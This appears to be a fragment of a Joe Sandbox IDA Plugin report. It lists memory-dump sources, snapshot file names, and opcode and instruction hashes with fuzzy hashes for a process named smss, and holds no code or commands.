                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_50_2_7ff88815c000_smss.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 59b54e4f0155e49337f677d3d96237b56353223a266226ebae1cc6452ed569a9
                                                                                        • Instruction ID: 09b959fa9bbb6ed0e868eca0509a7dcf99bd3bf187bc446d56c497d043f2a018
                                                                                        • Opcode Fuzzy Hash: 59b54e4f0155e49337f677d3d96237b56353223a266226ebae1cc6452ed569a9
                                                                                        • Instruction Fuzzy Hash: ECD1EE3890CA468FE36ADB28D4915B57BE1FF44784F1449BEC4CE93682DF29B842CB45
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000032.00000002.2543660952.00007FF888154000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888154000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_50_2_7ff888154000_smss.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: cf875bd6fb27025009ed85cecb08ddf31bbad2dd83559c828de373669fc91f67
                                                                                        • Instruction ID: 820ef41c505fbdd41664400cd1d8c33be0aea07f7a4f8e7c4a6d658cab139fb0
                                                                                        • Opcode Fuzzy Hash: cf875bd6fb27025009ed85cecb08ddf31bbad2dd83559c828de373669fc91f67
                                                                                        • Instruction Fuzzy Hash: 13D1103490DB468FE369DB28D4905B67BE1FF45384F1005BEC4AAC7A82DF29B842CB45
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000032.00000002.2543660952.00007FF888165000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888165000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_50_2_7ff888165000_smss.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: e9d31b6bc0a65dab529d5ae001c37713727fa7637d89325646e7d0c7a825814e
                                                                                        • Instruction ID: 8e7aa6fb40d6e3f4d9f7f79da2f2fb7b97642dbd8c360aa18a46472281a9ecf1
                                                                                        • Opcode Fuzzy Hash: e9d31b6bc0a65dab529d5ae001c37713727fa7637d89325646e7d0c7a825814e
                                                                                        • Instruction Fuzzy Hash: 75C1C0745186528FEB0ACF18D0E45B53BA1FF45350B6446BDD88B8B68BDB38F482CB49
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000032.00000002.2543660952.00007FF888154000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888154000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_50_2_7ff888154000_smss.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 7cc843df04ade21dbd68f9f9c996c5804e0b87f07d46f968ab663ce02fcd0dcc
                                                                                        • Instruction ID: cfb1620c844ec21cc4b8de45012b036fc200cf0004e8e843ca7539065c4e5a13
                                                                                        • Opcode Fuzzy Hash: 7cc843df04ade21dbd68f9f9c996c5804e0b87f07d46f968ab663ce02fcd0dcc
                                                                                        • Instruction Fuzzy Hash: A2C1BF745186528FEB09CF18C4E15B57BA1FF45350F6449BDC84A8BA8ACF38F881CB89
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000032.00000002.2543660952.00007FF888165000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888165000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_50_2_7ff888165000_smss.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: e5bcaa13b9f1ab6b3974ba8439f93b30c7de4ebfebef4ae077841acd15d4e1f6
                                                                                        • Instruction ID: 4108826933ed4d6e056ed3badd73a655b478ed0373fa782bbcf828057d00243b
                                                                                        • Opcode Fuzzy Hash: e5bcaa13b9f1ab6b3974ba8439f93b30c7de4ebfebef4ae077841acd15d4e1f6
                                                                                        • Instruction Fuzzy Hash: FAC1B2345195468FEB1ACF18C0E45B53BA1FF45354F5445BDC88A8B68BEB38F882CB89
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000032.00000002.2543660952.00007FF888165000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888165000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_50_2_7ff888165000_smss.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 8156c0a68123f875cde4597629bf67d84115abc772fd05f05c50f21ea02f1989
                                                                                        • Instruction ID: 4a7a6c88394eff8c4c4b3fbb7c4229bb96f1f14ef402e909d148552553f2d70b
                                                                                        • Opcode Fuzzy Hash: 8156c0a68123f875cde4597629bf67d84115abc772fd05f05c50f21ea02f1989
                                                                                        • Instruction Fuzzy Hash: C721351AF4C1978AF667E66438211FC7E50BF513A0F28027AC4DE860D3DE4C3846E39A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000032.00000002.2543660952.00007FF888165000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888165000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_50_2_7ff888165000_smss.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 6a0b32d74c32539a87e505758188cf95cc28ca838c2db95cdfba2a74919a66a2
                                                                                        • Instruction ID: 154ee50a2c4835dd315e4dde9839d04ca54de55de79a96ada64c1fa9b71532cb
                                                                                        • Opcode Fuzzy Hash: 6a0b32d74c32539a87e505758188cf95cc28ca838c2db95cdfba2a74919a66a2
                                                                                        • Instruction Fuzzy Hash: 2321F829D0D1978AF66BE6A8741A2FC5E807F40790F190176D4CF870D3EE0C3881D29A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000032.00000002.2543660952.00007FF88815C000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF88815C000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_50_2_7ff88815c000_smss.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 4534ff3cb99a1666ea2bee37ace9838dcb2ae2c12674def93af1371ee4e0bd9f
                                                                                        • Instruction ID: 108c4fda8ca386e438e03fdf9342e023e5c57567fbe5d03fe93624437ceb655e
                                                                                        • Opcode Fuzzy Hash: 4534ff3cb99a1666ea2bee37ace9838dcb2ae2c12674def93af1371ee4e0bd9f
                                                                                        • Instruction Fuzzy Hash: 0421D45AD0D597CAF2696A6864311F89E817F417D1F1901B7D00E8E0D3EE4C3985D39E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000032.00000002.2543660952.00007FF888165000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888165000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_50_2_7ff888165000_smss.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 66f68d10a694baf6b2b8be215776f01ea757eef224bb1b3c3945b435bd0b3ce2
                                                                                        • Instruction ID: 583f543abc9d58ba7de229ee6935e468d94d5c1aa462d193d754f7c45339ea42
                                                                                        • Opcode Fuzzy Hash: 66f68d10a694baf6b2b8be215776f01ea757eef224bb1b3c3945b435bd0b3ce2
                                                                                        • Instruction Fuzzy Hash: 0BB1EE745196458FEB5ACF18C0D06B13BA1FF49354B5446BCC88B8B68BDB78F882CB85
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000032.00000002.2543660952.00007FF888165000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888165000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_50_2_7ff888165000_smss.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 6341349d85c53d220606620689653d7471c08a403c5e8b9b920a5d7318cd6ca4
                                                                                        • Instruction ID: 249c41b72dc262c73d1d4affb53ea6b46ddcf1a11030bab17ee5262f6ee98514
                                                                                        • Opcode Fuzzy Hash: 6341349d85c53d220606620689653d7471c08a403c5e8b9b920a5d7318cd6ca4
                                                                                        • Instruction Fuzzy Hash: 4B21F51AD0C3578AE264B7A874215FD1D927FA0BE0F19017ED04FC60CADE4C3881DA9A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000032.00000002.2543660952.00007FF88815C000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF88815C000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_50_2_7ff88815c000_smss.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 88af3afe50f88473f9f4768f92c8ad7bb01d47fc692206d6cc008a6e15d223a5
                                                                                        • Instruction ID: 63178f503b2f179ef2dc7d61c1b6d5dfe719ed5d53bac756fc01774858e9f9b3
                                                                                        • Opcode Fuzzy Hash: 88af3afe50f88473f9f4768f92c8ad7bb01d47fc692206d6cc008a6e15d223a5
                                                                                        • Instruction Fuzzy Hash: 5D812535D0CA464FE3689A28A4561B97BE1FF45390F14057ED48FC7182DF2CB802C78A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000032.00000002.2543660952.00007FF888165000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888165000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_50_2_7ff888165000_smss.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 49899078d9929f32fcca85e77fbd0c661d5c13f2bd42140d238729f1e098c82d
                                                                                        • Instruction ID: b0ae8a678e0a076da44427e5ac8c191fe9f3d99c583aba2a01a65ad35a9f9ed1
                                                                                        • Opcode Fuzzy Hash: 49899078d9929f32fcca85e77fbd0c661d5c13f2bd42140d238729f1e098c82d
                                                                                        • Instruction Fuzzy Hash: 1E810F31A0C6464FE36A9A2898565BA7BE1FF85390F15047ED4CFC7183DF6AB802C746
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000032.00000002.2543660952.00007FF888154000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888154000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_50_2_7ff888154000_smss.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 26270f99cce67bfbfdff3d297213fe9f9d11e84acdeaeaba73bccf0eda8d876a
                                                                                        • Instruction ID: d7412a3b446673dface28d6fce869ee8751b189d2c371820e418cc05f81f9209
                                                                                        • Opcode Fuzzy Hash: 26270f99cce67bfbfdff3d297213fe9f9d11e84acdeaeaba73bccf0eda8d876a
                                                                                        • Instruction Fuzzy Hash: C38177B994C8494FE7ACDA1888D65B83BD0FF94390F0402F9D49EC7566DF38A816C785
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000032.00000002.2543660952.00007FF888165000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888165000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_50_2_7ff888165000_smss.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 32119c12f00d071a87917cec4ee12b17992a3088a68da8ec01871be7f94b0241
                                                                                        • Instruction ID: 6abb7bbd563459b993f76428ac6977e83749fbcf12cb2eb1ea43e620db57c3b8
                                                                                        • Opcode Fuzzy Hash: 32119c12f00d071a87917cec4ee12b17992a3088a68da8ec01871be7f94b0241
                                                                                        • Instruction Fuzzy Hash: 107125B590D6468FE32ADA2894455B5BBE1FF413A0F100A7ED4CEC3982DF2CB802C756
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000032.00000002.2543660952.00007FF888165000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888165000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_50_2_7ff888165000_smss.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: c79dc4ffe09613d135baa57ebbda40f22d93324101d94461c32cb2165a1a58fb
                                                                                        • Instruction ID: ccfda1485897eb3214e266cb6179c96979675dbf877318a975651edba072cb7e
                                                                                        • Opcode Fuzzy Hash: c79dc4ffe09613d135baa57ebbda40f22d93324101d94461c32cb2165a1a58fb
                                                                                        • Instruction Fuzzy Hash: 127137B990C5498FE76ADA18C8565F93BC0FF443A0F1402B9D4DEC7592DF18B81AC789
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000032.00000002.2543660952.00007FF88815C000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF88815C000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_50_2_7ff88815c000_smss.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: d1f09cd95091d0dc05e6f94cc11c3a4ffd91b49fdc37e52b9af249435377ba0b
                                                                                        • Instruction ID: 597ead071c9dbea56b7d4a25f2f82a6716e200d119c051c47f1311e51e440e22
                                                                                        • Opcode Fuzzy Hash: d1f09cd95091d0dc05e6f94cc11c3a4ffd91b49fdc37e52b9af249435377ba0b
                                                                                        • Instruction Fuzzy Hash: 3F713A3990C54A8FE768DE1C88565B93FD0FF48790F1402B9D49EC79A2DF1CA81AC789
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000032.00000002.2543660952.00007FF88815C000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF88815C000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_50_2_7ff88815c000_smss.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 48920ecc5de55ae253d01dc4393c8864e8207ba4d022c3007d1866b6129d76ca
                                                                                        • Instruction ID: 0756b047bea6298e135bdba54af89e6fba9b4a73bf30abccc2bbe4f4dfa08b7e
                                                                                        • Opcode Fuzzy Hash: 48920ecc5de55ae253d01dc4393c8864e8207ba4d022c3007d1866b6129d76ca
                                                                                        • Instruction Fuzzy Hash: BB918F746256058FEB0DCF18D0E05B13BA1FF49354B5446BDD84B8B68ADB38E492CB89
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000032.00000002.2543660952.00007FF888165000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888165000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_50_2_7ff888165000_smss.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 038bdb496ce87edf92da526844078b98597bfb604b65af2be12459352f2f9215
                                                                                        • Instruction ID: 6d67f76574768082c063137d4d8e6bba94abd49afde9adf976c3f49fe0a3c727
                                                                                        • Opcode Fuzzy Hash: 038bdb496ce87edf92da526844078b98597bfb604b65af2be12459352f2f9215
                                                                                        • Instruction Fuzzy Hash: D3711739A0C4494FE76ADA18985A5B93BC0FF44391F0402BDD4DEC75A2DF28B806C789
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000032.00000002.2543660952.00007FF88815C000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF88815C000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_50_2_7ff88815c000_smss.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 67afece71acfc05c2537a7d9936dd36de31a4dbf6a83058421fc8d350199d011
                                                                                        • Instruction ID: 7ce557665336d5a5ef7ffd492f76185e7e95d6622c44dcd01e200b544ef405c4
                                                                                        • Opcode Fuzzy Hash: 67afece71acfc05c2537a7d9936dd36de31a4dbf6a83058421fc8d350199d011
                                                                                        • Instruction Fuzzy Hash: 52917F746286058FEB4CCF18D0D16B53BA1FF49350F5446BDD84B8B68ADB38E892CB85
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000032.00000002.2543660952.00007FF888165000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888165000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_50_2_7ff888165000_smss.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: fca17525e1dfa02083a207c9531cb4b81645fcd46f15b96ee52748cf4774a3d0
                                                                                        • Instruction ID: cbcd443a8db99a39d3c6586840752ad7942df6206cc0bcc200d3237b0778905f
                                                                                        • Opcode Fuzzy Hash: fca17525e1dfa02083a207c9531cb4b81645fcd46f15b96ee52748cf4774a3d0
                                                                                        • Instruction Fuzzy Hash: 80614C3A50C6494FE7A8FA18D45A5B53FC0FF45750F0402BDE49EC75AADF18A80AC749
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000032.00000002.2543660952.00007FF88815C000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF88815C000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_50_2_7ff88815c000_smss.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 86334b9b98e1987933a100878f518e0d2b38ae8c3ca6e08c7f3a311101fd717a
                                                                                        • Instruction ID: f3f6cc1ccf703ff05218accca78f258dc3f51fdc016acd86cab87a55d581b936
                                                                                        • Opcode Fuzzy Hash: 86334b9b98e1987933a100878f518e0d2b38ae8c3ca6e08c7f3a311101fd717a
                                                                                        • Instruction Fuzzy Hash: 42712536C0C18A8FD704EFA8D8A15E97FA0FF11398F0801BAC09D8A093EE2C6546C756
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000032.00000002.2543660952.00007FF888154000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888154000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_50_2_7ff888154000_smss.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: f6d7199f177c112e350ba896de2cadac17c786ac342d5df594a41a77d3046fac
                                                                                        • Instruction ID: e43bc5c42324f5068fda502f6c8e34c5c8c04cc19d854c9115bee97a2b7aba22
                                                                                        • Opcode Fuzzy Hash: f6d7199f177c112e350ba896de2cadac17c786ac342d5df594a41a77d3046fac
                                                                                        • Instruction Fuzzy Hash: 1E718EB494854E8FEB94EF98D481AED7BB1FF58340F100179D40AE7286DF38A846CB85
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000032.00000002.2543660952.00007FF888165000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888165000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_50_2_7ff888165000_smss.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 18b56f11126faa6b08c0ea6e3424b058c4dba0798b5874f784823ee262b7f7c1
                                                                                        • Instruction ID: ed0783d027104dda7e18a1e4ec3e3b27f7023b9c3bf168acdb12c5fc9f9be396
                                                                                        • Opcode Fuzzy Hash: 18b56f11126faa6b08c0ea6e3424b058c4dba0798b5874f784823ee262b7f7c1
                                                                                        • Instruction Fuzzy Hash: 3E510336D092624BD710B6BCF8952E93B909F023B5B0951BBC0DD8F1A3EE1C6487D295
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000032.00000002.2367994017.00007FF887D91000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D91000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_50_2_7ff887d91000_smss.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 31fd5b29e0cb32b5b4492059cb31a9639e31e6cebd024331222442734aa25fce
                                                                                        • Instruction ID: 0915a56fa9bcd1726ed9c5a421744f32f2c3a946660dd5458f38e706dabda16e
                                                                                        • Opcode Fuzzy Hash: 31fd5b29e0cb32b5b4492059cb31a9639e31e6cebd024331222442734aa25fce
                                                                                        • Instruction Fuzzy Hash: 88513F30A1891A8FDB84EF58C0547AD73E2FBA8350F514279D41EC7296CB39AC51C745
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000032.00000002.2543660952.00007FF888150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888150000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_50_2_7ff888150000_smss.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: bf79b5a79112346d1b7057884a47a036a2867be3d9130ac9abcd567a81a9f50b
                                                                                        • Instruction ID: cb363faf4cfb2b986735e804d2ab0d11331b324bca40a29d620b0d63f8434a78
                                                                                        • Opcode Fuzzy Hash: bf79b5a79112346d1b7057884a47a036a2867be3d9130ac9abcd567a81a9f50b
                                                                                        • Instruction Fuzzy Hash: C441733160C9588FDF99EB2CC465EB9B7E1FB68325B04416ED40EC3692DE24E895CB81
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000032.00000002.2543660952.00007FF888165000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888165000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_50_2_7ff888165000_smss.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 3b672491cd52c64a3e6a08435b240804b555803c08c080f56a1978e9c918837d
                                                                                        • Instruction ID: b363709fc9761f1dec74855020c821d889845abf0accda9e04eaaddac8f4d773
                                                                                        • Opcode Fuzzy Hash: 3b672491cd52c64a3e6a08435b240804b555803c08c080f56a1978e9c918837d
                                                                                        • Instruction Fuzzy Hash: 30414131A0C9598FDB99FF28D495EB9B7E1FB69314B04416AD04EC3292DE34E845CB81
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000032.00000002.2543660952.00007FF888165000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888165000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_50_2_7ff888165000_smss.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 5e67e4f166a2c0e6928696f6789a2e1bab5ef943ef6d745881a43cd48188ff9a
                                                                                        • Instruction ID: b59f5a1e29b6e3e3169747a7d5892f98c9eb46d754332ea4f154d5d2b442994d
                                                                                        • Opcode Fuzzy Hash: 5e67e4f166a2c0e6928696f6789a2e1bab5ef943ef6d745881a43cd48188ff9a
                                                                                        • Instruction Fuzzy Hash: 0F41A531A0C9199FDF99EF28C455EB8B7E1FFA8310B0401AAD44EC3292DE25F851CB81
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000032.00000002.2543660952.00007FF88815C000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF88815C000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_50_2_7ff88815c000_smss.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 62933788d800a507743fb4e472b38e764a9ba0efefc3295dc5e27cfcdb043aaa
                                                                                        • Instruction ID: db37d024d5ca939ad675a0d67fc83afbd8b2956b701f6c720e9e7abeb893f2d3
                                                                                        • Opcode Fuzzy Hash: 62933788d800a507743fb4e472b38e764a9ba0efefc3295dc5e27cfcdb043aaa
                                                                                        • Instruction Fuzzy Hash: B7416331A0C9588FDB99FF2CD455EB8B7E1FB69314B0441A9D04ED7192DE24E845CB81
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000032.00000002.2543660952.00007FF888154000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888154000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_50_2_7ff888154000_smss.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: e22dfe5218ef5fc088cb1c8d02f75a255a20cb9f91cc473ec3329530f1efd556
                                                                                        • Instruction ID: 234de9aea5a8f176253e97497dda91751ab4057ac190c1b2424082e3058a6aa5
                                                                                        • Opcode Fuzzy Hash: e22dfe5218ef5fc088cb1c8d02f75a255a20cb9f91cc473ec3329530f1efd556
                                                                                        • Instruction Fuzzy Hash: 543104AEC8C19A8FF335969458959B93F90FF413A0F1401BAD45E870C2DF3C2992D79A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000032.00000002.2543660952.00007FF888150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888150000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_50_2_7ff888150000_smss.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 78f6c4d7678ec6afd3eea23064fdf923387d151d8c184d73004752fa44a004e8
                                                                                        • Instruction ID: 099d76b60e0f19d300d8348a61150d2821343a45450b480439d2d0db24b020b2
                                                                                        • Opcode Fuzzy Hash: 78f6c4d7678ec6afd3eea23064fdf923387d151d8c184d73004752fa44a004e8
                                                                                        • Instruction Fuzzy Hash: 95319231608A548FDB99EB2CC465EA5B7E1FF69314B0441AED44EC7292DE24E885CB81
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000032.00000002.2543660952.00007FF888165000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888165000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_50_2_7ff888165000_smss.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: cabb196486c915a69a240c1b7a54479b25a40f7e52b618ed1eb90550195641c0
                                                                                        • Instruction ID: bf6c79a7396bcee4a7bf1f66d8a1f6f8c46b1ccdb580b84106dee0b760c44302
                                                                                        • Opcode Fuzzy Hash: cabb196486c915a69a240c1b7a54479b25a40f7e52b618ed1eb90550195641c0
                                                                                        • Instruction Fuzzy Hash: 77317231A089598FDB59FF2CC099EB5B7E1FB69314B0442A9D05EC7292DE38E845CF81
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000032.00000002.2543660952.00007FF888165000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888165000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_50_2_7ff888165000_smss.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 0dec353d514d9621186c7d08c1a080612bcffb6853e42b25cfea113233cfbdf8
                                                                                        • Instruction ID: 3946ed39247b4769bfb807c7b08f8fb8c2746471a5e33097a1b48bf8ca4ddc56
                                                                                        • Opcode Fuzzy Hash: 0dec353d514d9621186c7d08c1a080612bcffb6853e42b25cfea113233cfbdf8
                                                                                        • Instruction Fuzzy Hash: 15318231A0C9559FDB99EF28C495EB4B7E1FFA931470401AED44EC7292DE24E841CB81
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000032.00000002.2543660952.00007FF88815C000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF88815C000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_50_2_7ff88815c000_smss.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 898d313d611c67edb86bbd992e3243b3564899473f768c53f8bb02393247896e
                                                                                        • Instruction ID: c68cab6dfaf660e600d11337bab5730d1040d4346e108faf0dc241a5a2750578
                                                                                        • Opcode Fuzzy Hash: 898d313d611c67edb86bbd992e3243b3564899473f768c53f8bb02393247896e
                                                                                        • Instruction Fuzzy Hash: A4314131A0C9588FDB99FF2CC455EB4B7E1FB69315B0442ADD04EC7292DE28E845CB81
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000032.00000002.2543660952.00007FF888154000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888154000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_50_2_7ff888154000_smss.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 131b69285f094bffb4f8d89de8781786193724ae5726677459608b5447f8b160
                                                                                        • Instruction ID: 4fc0da1bb01158466ffa569d5259ea96f711ad39eeea10b5c435630367b697f4
